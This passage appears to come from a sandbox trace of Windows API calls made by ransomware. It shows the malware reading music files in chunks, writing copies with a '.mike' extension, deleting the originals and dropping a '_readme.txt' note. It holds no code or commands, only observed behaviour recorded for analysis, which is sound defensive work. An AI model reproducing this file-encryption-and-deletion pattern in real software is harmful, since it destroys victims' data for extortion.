HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.326] GetFileType (hFile=0x1c8) returned 0x1 [0154.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.326] GetFileType (hFile=0x1c8) returned 0x1 [0154.326] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0154.327] ReadFile (in: hFile=0x1c8, lpBuffer=0x212359c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x212359c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0154.327] CloseHandle (hObject=0x1c8) returned 1 [0154.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", lpFilePart=0x0) returned 0x59 [0154.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.331] GetFileType (hFile=0x1c8) returned 0x1 [0154.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.331] GetFileType (hFile=0x1c8) returned 0x1 [0154.332] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0154.333] WriteFile (in: hFile=0x1c8, lpBuffer=0x212db04*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x212db04*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0154.334] CloseHandle (hObject=0x1c8) returned 1 [0154.335] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", lpFilePart=0x0) returned 0x54 [0154.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.336] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.336] GetFileType (hFile=0x1c8) returned 0x1 [0154.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.336] GetFileType (hFile=0x1c8) returned 0x1 [0154.336] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0154.337] ReadFile (in: hFile=0x1c8, lpBuffer=0x21305c4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21305c4*, lpNumberOfBytesRead=0x2af080*=0x515, lpOverlapped=0x0) returned 1 [0154.337] CloseHandle (hObject=0x1c8) returned 1 [0154.338] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", lpFilePart=0x0) returned 0x59 [0154.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.339] GetFileType (hFile=0x1c8) returned 0x1 [0154.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.339] GetFileType (hFile=0x1c8) returned 0x1 [0154.339] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0154.342] WriteFile (in: hFile=0x1c8, lpBuffer=0x2135348*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2135348*, lpNumberOfBytesWritten=0x2af074*=0x520, lpOverlapped=0x0) returned 1 [0154.342] CloseHandle (hObject=0x1c8) returned 1 [0154.342] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", lpFilePart=0x0) returned 0x59 [0154.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0154.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.345] GetFileType (hFile=0x1c8) returned 0x1 [0154.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0154.353] GetFileType (hFile=0x1c8) returned 0x1 [0154.360] WriteFile (in: hFile=0x1c8, lpBuffer=0x21385a4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21385a4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0154.360] CloseHandle (hObject=0x1c8) returned 1 [0154.360] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", lpFilePart=0x0) returned 0x54 [0154.360] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", lpFilePart=0x0) returned 0x59 [0154.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0154.360] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25234620, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25234620, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25495c20, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xcf40)) returned 1 [0154.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0154.360] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", lpFilePart=0x0) returned 0x54 [0154.360] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", lpFilePart=0x0) returned 0x59 [0154.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.360] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav.mike"), fInfoLevelId=0x0, lpFileInformation=0x2139dc0 | out: lpFileInformation=0x2139dc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25234620, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25234620, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25495c20, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xcf40)) returned 1 [0154.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.361] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", lpFilePart=0x0) returned 0x54 [0154.361] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", dwFileAttributes=0x80) returned 1 [0154.361] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", lpFilePart=0x0) returned 0x54 [0154.361] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav")) returned 1 [0154.362] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", lpFilePart=0x0) returned 0x54 [0154.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0154.362] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0154.362] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", lpFilePart=0x0) returned 0x54 [0154.362] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\_readme.txt", lpFilePart=0x0) returned 0x48 [0154.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0154.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0154.363] GetFileType (hFile=0x1c8) returned 0x1 [0154.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0154.363] GetFileType (hFile=0x1c8) returned 0x1 [0154.363] WriteFile (in: hFile=0x1c8, lpBuffer=0x213bb44*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x213bb44*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0154.364] CloseHandle (hObject=0x1c8) returned 1 [0154.364] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\f0bMV.m4a", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\f0bMV.m4a", lpFilePart=0x0) returned 0x46 [0154.364] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0154.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\fs512rjzk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.365] GetFileType (hFile=0x1c8) returned 0x1 [0154.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0154.365] GetFileType (hFile=0x1c8) returned 0x1 [0154.365] CloseHandle (hObject=0x1c8) returned 1 [0154.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.365] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0154.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0154.365] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0154.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0154.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.366] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\fs512rjzk.mp3"), fInfoLevelId=0x0, lpFileInformation=0x213f808 | out: lpFileInformation=0x213f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc60222d0, ftCreationTime.dwHighDateTime=0x1d4d4a8, ftLastAccessTime.dwLowDateTime=0x71ee2b20, ftLastAccessTime.dwHighDateTime=0x1d4c595, ftLastWriteTime.dwLowDateTime=0x71ee2b20, ftLastWriteTime.dwHighDateTime=0x1d4c595, nFileSizeHigh=0x0, nFileSizeLow=0x15551)) returned 1 [0154.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.366] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.366] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\fs512rjzk.mp3"), fInfoLevelId=0x0, lpFileInformation=0x213fb34 | out: lpFileInformation=0x213fb34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc60222d0, ftCreationTime.dwHighDateTime=0x1d4d4a8, ftLastAccessTime.dwLowDateTime=0x71ee2b20, ftLastAccessTime.dwHighDateTime=0x1d4c595, ftLastWriteTime.dwLowDateTime=0x71ee2b20, ftLastWriteTime.dwHighDateTime=0x1d4c595, nFileSizeHigh=0x0, nFileSizeLow=0x15551)) returned 1 [0154.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.366] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.366] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0154.366] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\fs512rjzk.mp3.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0154.366] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.366] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.366] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.366] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0154.367] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\fs512rjzk.mp3.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0154.367] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", 